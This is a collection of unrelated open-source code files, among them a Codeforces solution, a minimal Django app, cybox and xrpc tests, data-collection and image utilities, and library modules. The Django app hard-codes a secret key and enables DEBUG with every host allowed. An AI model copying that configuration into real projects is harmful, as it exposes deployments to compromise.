569e248140e15b1b5e02e5607a39007906d082fc | ea459bc6571b254f04fedb9262e297038773afe2 | /111_776A.py | b8d01b8351f7bc60fd6f5abd57c604e23a3162c4 | [] | no_license | ywtail/codeforces | 47da2564858e0c906aa715b3b8b76e6d41b76dd8 | 5c000124ff5ef1172494bc5c5dc252bcf8515ce1 | refs/heads/master | 2020-12-24T08:00:47.738455 | 2018-04-21T15:27:48 | 2018-04-21T15:27:48 | 59,407,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 744 | py | # coding=utf-8
# 776A. A Serial Killer
# Codeforces 776A (Python 2): track the two current people; each of the n
# input lines "old new" replaces the person `old` with `new`; the pair is
# printed initially and after every replacement.
a,b=raw_input().split()
n=int(raw_input())
print a,b
for i in range(n):
    temp=raw_input().split()
    if a==temp[0]:
        a=temp[1]
    if b==temp[0]:
        b=temp[1]
    print a,b
'''
input
ross rachel
4
ross joey
rachel phoebe
phoebe monica
monica chandler
output
ross rachel
joey rachel
joey phoebe
joey monica
joey chandler
input
icm codeforces
1
codeforces technex
output
icm codeforces
icm technex
题目地址:http://codeforces.com/problemset/problem/776/A
题目大意:第一行初始值,从第三行开始,将空格前面的字符串替换为后面的。
之前用replace做的,报错了。原因:假设现在有abk k,要将k替换成a,就会变成aba k,而不是替换单个字符k。
''' | [
"ywtail@gmail.com"
] | ywtail@gmail.com |
558a28d7a353b44934bab408ca1769ee54d76a03 | fb63d298e6e765b42cb9544695a69bd0c8cb544a | /app.py | e7affb6d0596256387ad24f22867591dbe0bbee0 | [
"MIT"
] | permissive | hirajanwin/Single-Page-Django-App | b33f1dfc6dd8048481577b9588908488de84873c | fe02a59784908161103b1ec8f6d0073c02f1d88f | refs/heads/master | 2022-12-30T23:17:35.517498 | 2020-10-20T22:36:06 | 2020-10-20T22:36:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | import sys
from django.conf import settings
from django.core.wsgi import get_wsgi_application
from django.http import HttpResponse
from django.urls import path
# https://docs.djangoproject.com/en/dev/topics/settings/#using-settings-without-setting-django-settings-module
# Minimal in-code Django configuration for a single-file app (no settings
# module).  NOTE(review): DEBUG=True and a hard-coded SECRET_KEY must not
# ship to production; load the key from the environment instead.
settings.configure(
    DEBUG=True,
    SECRET_KEY = 'w^h13cf0p8fl^98raarj#-u$c6e!)l@1rl!+9j^a%rrb*8xpe3',
    ALLOWED_HOSTS=['*'],
    ROOT_URLCONF=__name__,
)
def home_view(request, *args, **kwargs):
    """Return the landing page as a static HTML response."""
    return HttpResponse("<h1>Hello World</h1>")
def about_view(request, *args, **kwargs):
return HttpResponse("<h1>About World</h1>")
urlpatterns = [
path("", home_view),
path("about/", about_view)
]
application = get_wsgi_application()
if __name__ == "__main__":
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv) | [
"hello@teamcfe.com"
] | hello@teamcfe.com |
b09646433f33ef6fe4a3098d1f3e25f092a646f7 | b4eef8c2e03378328293bc41303879db3050bc98 | /watsondt/cybox/test/objects/win_semaphore_test.py | c9f3dd5987d2976f29a9397b387b63101f889b76 | [] | no_license | luisgf/watsondt | 18682a28397b27eece5ce8913ca66bc37c92e555 | 6b3b2f76be23e6a054a0188a02a93a5207099e55 | refs/heads/master | 2021-01-10T07:37:31.010055 | 2016-02-24T22:01:29 | 2016-02-24T22:01:29 | 52,477,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 912 | py | # Copyright (c) 2015, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
import unittest
from cybox.objects.win_semaphore_object import WinSemaphore
from cybox.test.objects import ObjectTestCase
class TestWinSemaphore(ObjectTestCase, unittest.TestCase):
    """Round-trip test fixture for the WindowsSemaphoreObjectType binding.

    The heavy lifting is done by ObjectTestCase (project base class), which
    presumably builds a WinSemaphore from _full_dict and verifies the
    serialization round-trip — confirm against cybox.test.objects.
    """
    # Values consumed by the ObjectTestCase machinery.
    object_type = "WindowsSemaphoreObjectType"
    klass = WinSemaphore
    # Fully-populated example object used for round-trip testing.
    _full_dict = {
        # Embedded Windows handle sub-object.
        'handle': {
            'id': 1234,
            'name': "MyHandle",
            'type': "Window",
            'object_address': 0xdeadbeef,
            'access_mask': 0x70000000,
            'pointer_count': 3,
            'xsi:type': "WindowsHandleObjectType",
        },
        'security_attributes': "Attributes go here",
        'named': False,
        'current_count': 100,
        'maximum_count': 250,
        'name': "A Test",
        'xsi:type': object_type
    }
if __name__ == "__main__":
unittest.main()
| [
"luisgf@luisgf.es"
] | luisgf@luisgf.es |
59527ef34011ce59e50f0ca795f7ae991f6efd07 | 9b142372020cd0e456ba07a08ce23d2d93804bec | /new_practice/functional_programming/function_enumerate.py | 6ac290355cb1191dadfb90021ee5f3be13453e72 | [] | no_license | pavel-malin/new_practices | 2f287a3477cc1cb4c1d0d668903a8e036e383b66 | c078fbfac0212bc258550023cc71cb25f0e4f533 | refs/heads/master | 2020-08-01T07:14:55.594507 | 2019-10-25T10:19:09 | 2019-10-25T10:19:09 | 210,911,049 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 195 | py | # Without enumerate
# Manual index-based iteration for comparison; assumes `mylist` is defined
# by the surrounding context — TODO confirm.
i = 0
while i < len(mylist):
    print("Item %d: %s" % (i, mylist[i]))
    i += 1
# With enumerate
# Same output, but enumerate() supplies the index and item together.
for i, item in enumerate(mylist):
    print("Item %d: %s" % (i, item))
| [
"kurchevskijpavel@gmail.com"
] | kurchevskijpavel@gmail.com |
a9b66394400c72c14bdb93febdfe8545e8a5e943 | 487eac14c3fcc5cd6be3bb9e10e765a18edd564a | /src/python/twitter/common/python/dependency.py | 81c76ee7fe40225523c86d818502f0c145bd774f | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | billwei/commons | 4a5ae6b183f871f4670b5a5d9c737824bac0623d | c980481f2627c336c7b75d57824c23d368f3ba43 | refs/heads/master | 2021-01-17T22:07:50.800151 | 2012-01-28T03:17:57 | 2012-01-28T03:17:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,985 | py | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
import os
import types
import zipfile
from twitter.common.python.dirwrapper import PythonDirectoryWrapper
from twitter.common.python.reqbuilder import ReqBuilder
from setuptools.package_index import EXTENSIONS as VALID_SOURCE_EXTENSIONS
"""
TODO(wickman): I don't like how this is factored right now, though it's an
improvement over what we used to have.
In the next iteration let's do:
Make PythonDependency a base class for:
PythonEggDependency <= .egg(s)
PythonTgzDependency <= .tgz
PythonReqDependency <= pkg_resources.Requirement
PythonDependency exports the API:
input_files()
activate(path) (idempotent) => .egg heads
We then encode PythonDependency blobs directly into the manifest to make the
dependencies more explicit than just autodetecting a bunch of ".egg" directories
in the "dependency" fileset of the chroot.
"""
class PythonDependency(object):
  """A set of .egg dependencies destined for a Python chroot/environment.

  Instances are created through the from_* factory methods, which normalize
  egg files, source archives, requirements and built distributions down to
  a mapping of egg basename -> PythonDirectoryWrapper.
  """

  class UnpackingError(Exception): pass
  class NotFoundError(Exception): pass
  class BuildError(Exception): pass
  class RequirementError(Exception): pass

  DEFAULT_URI = "http://pypi.python.org"

  @staticmethod
  def from_file(filename):
    """Build a dependency from an .egg file or a recognized source archive.

    Raises RequirementError for any unrecognized extension.
    """
    if filename.lower().endswith('.egg'):
      # BUG FIX: this previously called PythonDependency.from_egg, a method
      # that does not exist on this class (only from_eggs does), so every
      # .egg input raised AttributeError instead of producing a dependency.
      return PythonDependency.from_eggs(filename)
    else:
      for suffix in VALID_SOURCE_EXTENSIONS:
        if filename.lower().endswith(suffix):
          return PythonDependency.from_source(filename)
      raise PythonDependency.RequirementError(
        'Unrecognized Python dependency file format: %s!' % filename)

  # TODO(wickman): This arguably shouldn't belong -- we should probably
  # have the bootstrapper interface with ReqFetcher so that
  # install_requirements never goes out to the network w/o our knowledge.
  @staticmethod
  def from_req(requirement):
    """Resolve a requirement via ReqBuilder and wrap the built eggs."""
    dists = ReqBuilder.install_requirement(requirement)
    return PythonDependency.from_distributions(*list(dists))

  @staticmethod
  def from_source(filename):
    """Build egg distributions from a source archive on disk.

    Raises NotFoundError if the file does not exist.
    """
    if not os.path.exists(filename):
      raise PythonDependency.NotFoundError(
        "Could not find PythonDependency target %s!" % filename)
    dists = ReqBuilder.install_requirement(filename)
    return PythonDependency.from_distributions(*list(dists))

  @staticmethod
  def from_distributions(*distributions):
    """Wrap already-built distributions; every one must be an egg."""
    if not distributions:
      raise PythonDependency.BuildError(
        "Cannot extract PythonDependency from empty distribution!")
    else:
      if any(not dist.location.endswith('.egg') for dist in distributions):
        raise PythonDependency.RequirementError(
          'PythonDependency.from_distribution requires Egg distributions!')
      return PythonDependency.from_eggs(*[dist.location for dist in distributions])

  @staticmethod
  def from_eggs(*egg_paths):
    """Wrap one or more .egg paths directly."""
    return PythonDependency(egg_paths)

  def __init__(self, eggheads):
    """
    eggheads = List of files or directories that end with ".egg" and point to
      valid eggs.

    Not intended to be called directly. Instead use the from_* factory methods.
    """
    if not isinstance(eggheads, (types.ListType, types.TupleType)):
      raise ValueError('Expected eggs to be a list of filenames! Got %s' % type(eggheads))
    self._eggs = {}
    for egg in eggheads:
      # Key by basename so files() yields paths relative to the egg name.
      self._eggs[os.path.basename(egg)] = PythonDirectoryWrapper.get(egg)

  def files(self):
    """
    Iterator that yields
      (filename, content)

    Where filename is going to be:
      my_egg.egg if a file egg
      my_egg.egg/EGG-INFO/stuff1.txt if a directory egg or unzipsafe egg
    """
    for egg, wrapper in self._eggs.iteritems():
      all_files = sorted(wrapper.listdir())
      if 'EGG-INFO/zip-safe' in all_files and wrapper.is_condensed():
        # Zip-safe condensed egg: ship the whole zip as a single blob.
        with open(wrapper.path(), 'r') as fp:
          yield (egg, fp.read())
      else:
        for filename in all_files:
          # do space optimization where we skip .pyc/.pyo if the .py is already included
          if (filename.endswith('.pyc') or filename.endswith('.pyo')) and (
              '%s.py' % filename[:-4] in all_files):
            continue
          yield (os.path.join(egg, filename), wrapper.read(filename))
| [
"jsirois@twitter.com"
] | jsirois@twitter.com |
8dff5822ab1b4f7f2607db2d045a4a5e89fd310a | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_usage.py | a9c1c291214946757c3b7d41f1297ba952011a44 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py |
#calss header
class _USAGE():
    """Lexical word-base entry for the noun "usage".

    Generated record: holds the dictionary sense definitions plus empty
    taxonomy slots (parents/childen/properties) and a jsondata payload.
    """

    def __init__(self):
        self.name = "USAGE"
        # Dictionary sense definitions (trailing spaces preserved from the
        # generated data).
        self.definitions = [u'the way a particular word in a language, or a language in general, is used: ', u'the way something is treated or used: ', u'the bad and unfair way someone treats you: ']
        self.parents = []
        self.childen = []  # sic: generated field name (not "children")
        self.properties = []
        self.jsondata = {}
        self.specie = 'nouns'

    def run(self, obj1=None, obj2=None):
        """Return the JSON payload for this entry.

        obj1/obj2 are accepted for interface compatibility and are unused.
        They previously defaulted to mutable lists ([]) — a Python
        anti-pattern; None defaults are behaviorally equivalent here
        because the arguments are never read.
        """
        return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
ca7907b8d1400a229dd989b9c40e5c385916658d | f9bd7c1475b2ee956ca4bdbd6a35071b3c5ae5d9 | /test/sorted_array_to_bst.py | 4ef9c8088b51814db0c1437a23f8bc438bcbfd71 | [
"MIT"
] | permissive | gsathya/dsalgo | 7f984c1288f1894cf458ec4bafb6291a4e239c8d | 61c89ec597ced3e69bfbb438fd856c8fc5f20aba | refs/heads/master | 2020-05-18T02:28:18.390769 | 2014-10-16T19:32:00 | 2014-10-16T19:32:00 | 16,241,162 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | import unittest
from lib import bst
from algo import sorted_array_to_bst
class TestSortedArrayToBST(unittest.TestCase):
    """Smoke test for sorted_array_to_bst.convert.

    NOTE(review): test_add only checks that convert() runs without raising;
    it makes no assertions about the resulting tree shape.
    """
    def setUp(self):
        # Fresh project BST instance per test.
        self.bst = bst.BST()
    def test_add(self):
        # Build a BST from the sorted values 0..6 (inclusive index bounds).
        vals = range(7)
        sorted_array_to_bst.convert(vals, 0, len(vals)-1, self.bst)
| [
"gsathya.ceg@gmail.com"
] | gsathya.ceg@gmail.com |
9674cf7ffd5bfb6e9597610c956057aa62ddfc87 | 0693cce8efbeca806f4551c22dce60d5f392c5c9 | /contentful_management/editor_interface.py | b3d213115f887570c052d167d231e3f697e8a7df | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | timwis/contentful-management.py | 2dc4b7389ca2136ee2a12b89812b18ef2a347e67 | d71a0e18205d1de821b41c7225e8244e786be7f3 | refs/heads/master | 2021-06-28T12:04:58.130393 | 2017-08-10T16:30:09 | 2017-08-10T16:32:50 | 103,517,328 | 0 | 0 | null | 2017-09-14T10:04:48 | 2017-09-14T10:04:48 | null | UTF-8 | Python | false | false | 1,645 | py | from .resource import Resource
"""
contentful_management.editor_interface
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module implements the EditorInterface class.
API reference: https://www.contentful.com/developers/docs/references/content-delivery-api/#/reference/editor-interfaces
:copyright: (c) 2017 by Contentful GmbH.
:license: MIT, see LICENSE for more details.
"""
class EditorInterface(Resource):
    """
    Management-API resource for a content type's editor interface.

    API reference: https://www.contentful.com/developers/docs/references/content-delivery-api/#/reference/editor-interfaces
    """
    def __init__(self, item, **kwargs):
        super(EditorInterface, self).__init__(item, **kwargs)
        # Per-field editor widget configuration; defaults to no controls.
        self.controls = item.get('controls', [])
    # NOTE(review): classmethod whose first parameter is named `self`
    # (it actually receives the class); kept as-is for compatibility.
    @classmethod
    def base_url(self, space_id, content_type_id, **kwargs):
        """
        Returns the URI for the editor interface.
        """
        return "spaces/{0}/content_types/{1}/editor_interface".format(
            space_id,
            content_type_id
        )
    @classmethod
    def update_attributes_map(klass):
        """
        Attributes for object mapping.

        Maps the 'controls' attribute to an empty-list default.
        """
        return {'controls': []}
    def to_json(self):
        """
        Returns the JSON representation of the editor interface.

        Extends the base Resource JSON with the 'controls' list.
        """
        result = super(EditorInterface, self).to_json()
        result.update({'controls': self.controls})
        return result
    def _update_url(self):
        # Editor interfaces are updated at their base URL (no per-resource id);
        # space/content_type come from attributes set by the Resource base.
        return self.__class__.base_url(
            self.space.id,
            self.content_type.id
        )
    def __repr__(self):
        return "<EditorInterface id='{0}'>".format(
            self.sys.get('id', '')
        )
| [
"david.litvakb@gmail.com"
] | david.litvakb@gmail.com |
6f51613fafe60c7d57c562aac5a76f18afd45aff | 60f2d047db9433b1fa211cec5e6dbdee961d0e39 | /sina_data/command.py | e8f434d3f012e57f72c457edf0ed845acb1fbcf0 | [] | no_license | cheatm/DataCollector | a43071868bcac8fde64875332c0f597e46c5e736 | 8daab8673b5f07939e7073055f916d260727ec47 | refs/heads/master | 2020-12-02T22:53:14.085439 | 2017-07-06T09:47:36 | 2017-07-06T09:47:36 | 96,197,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,258 | py | # encoding:utf-8
from file_manager import FileManger
import json
from fxdayu_data import MongoHandler
import pandas as pd
import os
import logger
# ensure_tick # 按tick文件更新索引
# update_index # 更新索引日期
# emend_db # 按数据库更新索引
# write_db # 根据索引写数据库
# req_tick_data # 根据索引向MQ提交数据下载任务
# ensure_index # 按tick和数据库更新索引
# download_tick # 监听MQ下载tick数据
try:
root = os.environ.get("SINADATA")
fm = FileManger(root)
handler = MongoHandler.params(**json.load(open(root+'/mongo.json')))
except:
root = None
fm = None
handler = None
def write_db():
    """Write indexed tick data into MongoDB (uses module-level fm/handler)."""
    import index_db
    index_db.write_db(fm, handler, logger.get_time_rotate("WriteDBLog"))
def download_tick():
    """Run a blocking MQ consumer that saves incoming tick data."""
    import save_tick
    from worker import Consumer, TornadoWorker
    import MQconfig
    TornadoWorker.params(
        Consumer(save_tick.callback, MQconfig.queue, MQconfig.consume)
    ).start()
def emend_db(include_2=False):
    """Update the on-disk index from what is already stored in MongoDB.

    include_2: forwarded to index_db.do_scan; presumably widens the scan
    to additional log/status records — TODO confirm against index_db.
    """
    import index_db
    log = logger.get_time_rotate("CommandLog")
    db = handler.client[handler.db]
    for code in fm.find_stocks():
        try:
            index_db.do_scan(code, fm, db[code], include_2)
            log.info("EmendDB {} success".format(code))
        except Exception as e:
            # Per-stock isolation: one failed scan must not stop the rest.
            log.error("EmendDB {} fail {}".format(code, e))
def ensure_tick():
    """Update the index from on-disk tick files, one stock at a time."""
    log = logger.get_time_rotate("CommandLog")
    for code in fm.find_stocks():
        result = fm.ensure_tick(code)
        # fm.ensure_tick returns a DataFrame on success or an Exception
        # object (returned, not raised) on failure; other values are ignored.
        if isinstance(result, pd.DataFrame):
            log.info("Ensure {} success".format(code))
        elif isinstance(result, Exception):
            log.error("Ensure {} fail {}".format(code, result))
def update_index(update_bench=True):
    """Refresh every stock's index against the benchmark calendar.

    update_bench: when True, the benchmark itself is refreshed first.
    """
    log = logger.get_time_rotate("CommandLog")
    benchmark = fm.get_benchmark(update_bench)
    for code in fm.find_stocks():
        result = fm.update_stock(code, benchmark.index)
        # Same convention as ensure_tick: DataFrame == success,
        # returned Exception instance == failure.
        if isinstance(result, pd.DataFrame):
            log.info("UpdateIndex {} success".format(code))
        elif isinstance(result, Exception):
            log.error("UpdateIndex {} fail {}".format(code, result))
def req_tick_data():
    """Publish data-download requests to the MQ exchange (blocking loop)."""
    from worker import TornadoWorker, Producer
    import MQconfig
    import req_data
    TornadoWorker.params(
        Producer(req_data.check(), MQconfig.exchange, MQconfig.queue, MQconfig.bind)
    ).start()
def ensure_index(include_2=False):
    """Convenience: rebuild index from tick files, then emend from the DB."""
    ensure_tick()
    emend_db(include_2)
import click
# CLI wiring. NOTE: the subcommand docstrings below double as click help
# text (runtime output), so they are left byte-identical.
@click.group(chain=True)
def command():
    # Root click group; chain=True allows several subcommands per invocation.
    pass
# Thin wrapper around ensure_tick().
@command.command()
def tick():
    """read tick file and update index"""
    ensure_tick()
# Thin wrapper around update_index(); --bench refreshes the benchmark first.
@command.command()
@click.option("--bench", is_flag=True, help='update benchmark before update stock index')
def update(bench):
    """
    update stock index by benchmark
    """
    update_index(bench)
# Thin wrapper around req_tick_data().
@command.command()
def require():
    """read index and post DataRequestMessage to MQ"""
    req_tick_data()
# Thin wrapper around write_db().
@command.command()
def write():
    """read index and write data into db"""
    write_db()
# Thin wrapper around emend_db().
@command.command()
@click.option("--include2", is_flag=True, help="check all data in index")
def emend(include2):
    """
    read db and update index
    --include2: check all log
    """
    emend_db(include2)
from datetime import datetime
@command.command()
@click.option("--start", default='2012-06-01')
@click.option("--end", default=datetime.now().strftime("%Y-%m-%d"))
@click.option("--stock_index", is_flag=True)
def create(start, end, stock_index):
"""create index dir"""
os.makedirs(root+'/')
os.makedirs(root+'/Log/')
fm = FileManger(root)
benchmark = fm.create_benchmark(start, end)
print "create benchmark {}".format(fm.benchmark)
import json
codes = json.load(open('stocks.json'))
json.dump(codes, open('stocks.json', 'w'))
if stock_index:
for code in codes:
try:
fm.create_stock(code, benchmark.index)
print "create index {}".format(code)
except:
print "create index {} failed".format(code)
# Thin wrapper around download_tick() (blocking MQ listener).
@command.command()
def download():
    """activate download listener to MQ"""
    download_tick()
if __name__ == '__main__':
    # Dispatch to the click group when run as a script.
    command()
| [
"862786917@qq.com"
] | 862786917@qq.com |
7b16ff529324924577f1dd439cee9d8a24bdad19 | 72ea8dbdbd68813156b76c077edb5a3806bf42ab | /synapse/tools/melder.py | d20397c0808530674c4fbcc272855608dc5de77a | [
"Apache-2.0"
] | permissive | williballenthin/synapse | 5c6f197f5a3cb3566c48dc444770592e89d4152a | 799854da814b79d6631e5cc2796c347bf4a80ce7 | refs/heads/master | 2020-12-24T14:19:12.530026 | 2017-03-16T20:30:38 | 2017-03-16T20:30:38 | 41,521,212 | 2 | 0 | null | 2015-08-28T02:01:50 | 2015-08-28T02:01:50 | null | UTF-8 | Python | false | false | 1,619 | py | import sys
import msgpack
import argparse
import synapse.mindmeld as s_mindmeld
from synapse.common import *
def main(argv):
    '''
    Command line tool for MindMeld construction/manipulation.

    Loads the meld file if it already exists, applies the requested
    mutations (name/version/pypaths), optionally dumps the info dict,
    and writes the msgpack-encoded meld back to the same path.
    '''
    p = argparse.ArgumentParser(prog='melder')
    p.add_argument('meldfile',help='meld file path')
    p.add_argument('--add-pypath', dest='pypaths', default=[], action='append', help='add a python path to the meld')
    p.add_argument('--add-datfiles', dest='datfiles', action='store_true', help='when adding pypath, include datfiles')
    p.add_argument('--dump-info', dest='dumpinfo', action='store_true', help='dump the entire meld info dictionary to stdout')
    p.add_argument('--set-name', dest='name', default=None, help='set meld name (ie, "foolib")')
    p.add_argument('--set-version', dest='version', default=None, help='set meld version (ie, 8.2.30)')
    opts = p.parse_args(argv)
    # Start from the existing meld's info dict when the file is present.
    meldinfo = {}
    if os.path.isfile(opts.meldfile):
        with open(opts.meldfile,'rb') as fd:
            meldinfo = msgpack.load(fd,encoding='utf8')
    meld = s_mindmeld.MindMeld(**meldinfo)
    if opts.version:
        # vertup parses "8.2.30"-style strings into a version tuple.
        meld.setVersion(vertup(opts.version))
    if opts.name:
        meld.setName(opts.name)
    for pypath in opts.pypaths:
        meld.addPyPath(pypath,datfiles=opts.datfiles)
    meldinfo = meld.getMeldDict()
    if opts.dumpinfo:
        print(repr(meldinfo))
    # Serialize and overwrite the meld file in place.
    meldbyts = msgpack.dumps( meld.getMeldDict(), encoding='utf8', use_bin_type=True )
    with open(opts.meldfile,'wb') as fd:
        fd.write(meldbyts)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| [
"invisigoth@kenshoto.com"
] | invisigoth@kenshoto.com |
0e51fba2f80f46ac06c1128a50b217af17862cff | 3fd3da4f11a251cc43d44d1d61ff2ffe5c82a4ce | /dlp/common/img_util.py | 8fafd5919c6f8c89627cc176e0b8598124df38f2 | [] | no_license | dumpinfo/TsBook | d95faded917bce3e024e77ff06afd30717ed9ef4 | 8fadfcd2ebf935cd49784fd27d66b2fd9f307fbd | refs/heads/master | 2023-05-27T07:56:24.149421 | 2019-07-31T20:51:52 | 2019-07-31T20:51:52 | 198,481,031 | 1 | 3 | null | 2023-05-22T21:13:31 | 2019-07-23T17:47:19 | Jupyter Notebook | UTF-8 | Python | false | false | 1,764 | py | from PIL import Image as image
def get_scaled_dims(org_w, org_h, dest_w, dest_h):
    """Fit (org_w, org_h) into the (dest_w, dest_h) box, keeping aspect ratio.

    One destination dimension is taken in full; the other is scaled so the
    original proportions are preserved. Both results are truncated to int.
    """
    # First try pinning the width to dest_w.
    fitted_h = (dest_w / org_w) * org_h
    if fitted_h < dest_h:
        return int(dest_w), int(fitted_h)
    # Too tall at full width: pin the height to dest_h instead.
    fitted_w = (dest_h / org_h) * org_w
    return int(fitted_w), int(dest_h)
def get_resized_dim(ori_w, ori_h, dest_w, dest_h):
    """Shrink (never enlarge) (ori_w, ori_h) to fit within (dest_w, dest_h).

    If the original already fits it is returned unchanged (untruncated);
    otherwise both dimensions are scaled by the smaller applicable ratio
    and truncated to int. A falsy dest dimension disables that limit.
    """
    if not ((ori_w and ori_w > dest_w) or (ori_h and ori_h > dest_h)):
        return ori_w, ori_h
    # Collect the shrink factor each violated limit would require; the
    # float() cast keeps true division under Python 2 as well.
    shrink_factors = []
    if dest_w and ori_w > dest_w:
        shrink_factors.append(float(dest_w) / ori_w)
    if dest_h and ori_h > dest_h:
        shrink_factors.append(float(dest_h) / ori_h)
    # The tighter (smaller) factor satisfies both limits; scale stays 1 when
    # neither limit applied (e.g. only a disabled dimension overflowed).
    scale = min(shrink_factors) if shrink_factors else 1
    return int(ori_w * scale), int(ori_h * scale)
def resize_img_file(org_img, dest_img, dest_w, dest_h, save_quality=35):
    """Load org_img, shrink it to fit (dest_w, dest_h) and save to dest_img.

    save_quality is forwarded to PIL's save() (JPEG-style quality setting).
    """
    print('resize the image')  # NOTE(review): debug print left in
    im = image.open(org_img)
    print('im={0}'.format(im))  # NOTE(review): debug print left in
    ori_w, ori_h = im.size
    newWidth, newHeight = get_resized_dim(ori_w, ori_h, dest_w, dest_h)
    im.resize((newWidth,newHeight),image.ANTIALIAS).save(dest_img,quality=save_quality)
def resize_img(im, dest_w, dest_h, save_quality=35):
    """Return a shrunk copy of PIL image *im* fitting (dest_w, dest_h).

    NOTE(review): save_quality is accepted but unused here (nothing is
    saved); kept for signature symmetry with resize_img_file.
    """
    ori_w, ori_h = im.size
    newWidth, newHeight = get_resized_dim(ori_w, ori_h, dest_w, dest_h)
    return im.resize((newWidth,newHeight),image.ANTIALIAS)
| [
"twtravel@126.com"
] | twtravel@126.com |
8beda32bbb13b6f511b0c1daa4f271163ee84276 | b820ed3fba2c851715905116ef437843b3532b57 | /owners/stores/admin.py | 19525f46b5d315117deb9e8b7fb84b6557820ef8 | [] | no_license | dev-fahim/retail_app | f88ea96dd4b95516598f4fceedca31a02e8eaeb3 | 41438560a8dac3c1f3cfd966373230dc2c3af9ff | refs/heads/master | 2022-12-11T06:05:29.023809 | 2019-01-12T17:01:27 | 2019-01-12T17:01:27 | 156,075,067 | 0 | 0 | null | 2022-11-22T03:06:03 | 2018-11-04T11:27:55 | Python | UTF-8 | Python | false | false | 149 | py | from django.contrib import admin
from owners.stores.models import OwnerStoreModel
# Register your models here.
admin.site.register(OwnerStoreModel)
| [
"fahim6668@gmail.com"
] | fahim6668@gmail.com |
ca1f46c68d3b1cfef20fcac79a1a882105478872 | fbbe424559f64e9a94116a07eaaa555a01b0a7bb | /Tensorflow_Pandas_Numpy/source3.6/tensorflow/contrib/kfac/python/ops/utils_lib.py | ddbb4485ce6967082f1844c6d798c078f1cc303b | [
"MIT"
] | permissive | ryfeus/lambda-packs | 6544adb4dec19b8e71d75c24d8ed789b785b0369 | cabf6e4f1970dc14302f87414f170de19944bac2 | refs/heads/master | 2022-12-07T16:18:52.475504 | 2022-11-29T13:35:35 | 2022-11-29T13:35:35 | 71,386,735 | 1,283 | 263 | MIT | 2022-11-26T05:02:14 | 2016-10-19T18:22:39 | Python | UTF-8 | Python | false | false | 1,520 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,wildcard-import
from tensorflow.contrib.kfac.python.ops.utils import *
from tensorflow.python.util.all_util import remove_undocumented
# pylint: enable=unused-import,line-too-long,wildcard-import
# Names re-exported from kfac utils that remove_undocumented must keep
# visible on this module; everything else is stripped below.
_allowed_symbols = [
    "SequenceDict",
    "setdefault",
    "tensors_to_column",
    "column_to_tensors",
    "kronecker_product",
    "layer_params_to_mat2d",
    "mat2d_to_layer_params",
    "compute_pi",
    "posdef_inv",
    "posdef_inv_matrix_inverse",
    "posdef_inv_cholesky",
    "posdef_inv_funcs",
    "SubGraph",
    "generate_random_signs",
    "fwd_gradients",
]

remove_undocumented(__name__, allowed_exception_list=_allowed_symbols)
| [
"ryfeus@gmail.com"
] | ryfeus@gmail.com |
396c94f3cc267a2427d8631410da750806a52241 | ecfc473acd6dc4a6ccf401b64a2eee227b056a9e | /xrpc_tests/test_dict.py | 35d2e574b6fb13a34128c860af07da8509b72157 | [
"Apache-2.0"
] | permissive | andreycizov/python-xrpc | 774cb2a433a86d83cc55d92b7c4d0c0d6780577b | ed403ae74d5e89e0ebac68bcc58591d6b32742ff | refs/heads/master | 2020-03-22T13:48:03.024609 | 2019-08-07T11:33:19 | 2019-08-07T11:33:19 | 140,132,337 | 0 | 0 | Apache-2.0 | 2018-07-09T01:53:08 | 2018-07-08T02:46:45 | Python | UTF-8 | Python | false | false | 895 | py | import unittest
from datetime import timedelta
from xrpc.dict import RPCLogDict, ObjectDict
from xrpc.error import HorizonPassedError
from xrpc.net import RPCKey
from xrpc.util import time_now
class TestDict(unittest.TestCase):
    """Behavioral tests for xrpc's RPCLogDict horizon handling and ObjectDict."""
    def test_rpclogdict(self):
        cr = time_now()
        x = RPCLogDict(cr)
        # (a) keys stamped before the dict's creation horizon are rejected.
        with self.subTest('a'):
            with self.assertRaises(HorizonPassedError):
                x[RPCKey(time_now() - timedelta(seconds=10))] = False
        kv = RPCKey()
        # (b) a fresh key round-trips normally.
